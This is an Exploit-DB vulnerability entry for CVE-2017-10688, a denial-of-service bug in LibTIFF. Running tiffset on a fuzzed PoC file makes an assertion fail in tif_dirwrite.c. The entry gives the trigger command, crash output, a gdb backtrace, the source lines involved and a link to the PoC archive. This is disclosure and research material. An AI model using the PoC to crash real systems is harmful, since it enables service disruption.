LibTIFF - 'tif_dirwrite.c' Denial of Service

EDB-ID: 42299
Author: team OWL337
Published: 2017-07-06
CVE: CVE-2017-10688
Type: Dos
Platform: Linux
Aliases: N/A
Advisory/Source: Link
Tags: Denial of Service (DoS)
Vulnerable App: N/A

  
 Triggered by  "./tiffset POC1" 
  
 $ ./tiffset POC1 
 TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered. 
 TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered. 
 poc3: AdobeDeflate compression support is not configured. 
 tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF 
 *, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion 
 `tif->tif_flags&TIFF_BIGTIFF' failed. 
 Aborted 
  
 The gdb debugging information is listed below: 
 (gdb) set args POC1 
 (gdb) r 
 ... 
 (gdb) c 
 Continuing. 
 TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered. 
 TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered. 
 poc2: AdobeDeflate compression support is not configured. 
  
 Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=<optimized out>, 
 ndir=<optimized out>, count=1,  
     value=0x615c20, dir=<optimized out>, tag=<optimized out>) at 
 tif_dirwrite.c:2127 
 2127        assert(tif->tif_flags&TIFF_BIGTIFF); 
 (gdb) bt 
 #0  0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at 
 ../sysdeps/unix/sysv/linux/raise.c:54 
 #1  0x00007ffff746c02a in __GI_abort () at abort.c:89 
 #2  0x00007ffff7462bd7 in __assert_fail_base (fmt=<optimized out>,  
     assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF",  
     file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127,  
     function=function@entry=0x7ffff7baf8e2 "int 
 TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *, 
 uint16, uint32, uint64 *)") at assert.c:92 
 #3  0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949 
 "tif->tif_flags&TIFF_BIGTIFF",  
     file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127,  
     function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, 
 uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101 
 #4  0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010, 
 ndir=<optimized out>, count=1,  
     value=0x615c20, dir=<optimized out>, tag=<optimized out>) at 
 tif_dirwrite.c:2127 
 #5  TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=<optimized 
 out>, ndir=<optimized out>,  
     dir=<optimized out>, tag=<optimized out>) at tif_dirwrite.c:1462 
 #6  TIFFWriteDirectorySec (tif=<optimized out>, isimage=<optimized out>, 
 imagedone=<optimized out>,  
     pdiroff=<optimized out>) at tif_dirwrite.c:746 
 #7  0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at 
 tif_dirwrite.c:184 
 #8  TIFFRewriteDirectory (tif=<optimized out>) at tif_dirwrite.c:360 
 #9  0x0000000000402bc7 in main (argc=<optimized out>, argv=<optimized out>) at 
 tiffset.c:344 
  
 Trigged in line tif_dirwrite.c:2127 at function 
 TIFFWriteDirectoryTagCheckedLong8Array() 
 2122 static int 
 2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir, 
 TIFFDirEntry* dir, uint16 tag, uint32 count, uint64*      value) 
 2124 {        
 2125         assert(count<0x20000000); 
 2126         assert(sizeof(uint64)==8); 
 2127         assert(tif->tif_flags&TIFF_BIGTIFF); 
 2128         if (tif->tif_flags&TIFF_SWAB) 
 2129                 TIFFSwabArrayOfLong8(value,count); 
 2130         
 return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value)); 
 2131 } 
  
 [note]: Tiffset sets the value of a TIFF header to a specified value.It will 
 modify the raw POC file,so you'd better make a backup file every time you are 
 going to run. 
  
 Credits: 
  
 This vulnerability is detected by team OWL337, with our custom fuzzer collAFL. 
 Please contact [email protected]   and [email protected] if you need 
 more info about the team, the tool or the vulnerability. 
  
  
 Proof of Concept: 
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip

Source: www.exploit-db.com